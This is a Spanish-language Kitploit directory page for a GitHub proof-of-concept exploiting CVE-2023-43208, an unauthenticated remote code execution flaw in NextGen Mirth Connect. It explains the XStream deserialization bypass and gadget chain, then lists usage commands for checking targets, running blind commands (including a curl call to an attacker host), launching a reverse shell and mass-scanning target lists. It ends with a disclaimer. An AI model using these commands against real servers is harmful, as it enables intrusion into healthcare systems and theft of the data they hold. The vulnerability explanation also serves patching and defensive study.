Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-43208 — CVE-2023-43208: PoC de RCE Pre-Auth en Mirth Connect | Kitploit
Herramientas/GitHubGitHub/kyakei/cve-2023-43208
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHubkyakei/cve-2023-43208

CVE-2023-43208

CVE-2023-43208: PoC de RCE Pre-Auth en Mirth Connect

Ver Repositorio
31hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-43208 — Mirth Connect RCE sin autenticación

Ejecución remota de código sin autenticación en NextGen Healthcare Mirth Connect < 4.4.1 mediante una evasión de la deserialización de XStream.

CVSS 9.8 (Crítico) — Evasión del parche de CVE-2023-37679

Descripción general

Mirth Connect usa la librería Java XStream para deserializar cargas útiles XML en el endpoint /api/users sin autenticación. El parche original (CVE-2023-37679) introdujo una lista negra de clases peligrosas, pero esta fue evadida usando EventBindingInvocationHandler de Apache Commons Lang3 combinado con la cadena InvokerTransformer de Commons Collections4.

Corregido en Mirth Connect 4.4.1 cambiando de lista negra a lista blanca.

Requisitos

root@kitploit:~
pip install requests

Python 3.10+ (usa sentencias match).

Uso

Comprobar si un objetivo es vulnerable

root@kitploit:~
python3 exploit.py check -t https://target:8443

Ejecutar un comando (RCE ciega — sin salida)

root@kitploit:~
python3 exploit.py exec -t https://target:8443 -c "id"
python3 exploit.py exec -t https://target:8443 -c "curl http://attacker/pwned"

Lanzar una reverse shell

root@kitploit:~
# Terminal 1 (or let the script handle the listener):
python3 exploit.py shell -t https://target:8443 --lhost 10.10.10.10 --lport 4444

# For better shell experience, use rlwrap:
rlwrap python3 exploit.py shell -t https://target:8443 --lhost 10.10.10.10 --lport 4444

Escanear múltiples objetivos

root@kitploit:~
python3 exploit.py scan -f targets.txt -o vulnerable.txt -T 30

Cadena de ataque

root@kitploit:~
POST /api/users  (no auth)
     │
     ▼
XStream deserializes XML payload
     │
     ▼
sorted-set triggers Comparable.compareTo()
     │
     ▼
dynamic-proxy → EventBindingInvocationHandler (bypasses denylist)
     │
     ▼
ChainedTransformer.transform()
     │
     ▼
ConstantTransformer(Runtime.class)
  → InvokerTransformer("getRuntime")
    → InvokerTransformer("invoke")
      → InvokerTransformer("exec", <command>)
           │
           ▼
      OS command execution as Mirth Connect service user

Aviso legal

Esta herramienta se proporciona únicamente para pruebas de seguridad autorizadas y fines educativos. El acceso no autorizado a sistemas informáticos es ilegal. Obtenga siempre la autorización adecuada antes de realizar pruebas.

Referencias

  • NVD — CVE-2023-43208
  • Horizon3.ai — Análisis
  • Catálogo KEV de CISA
Descargar herramienta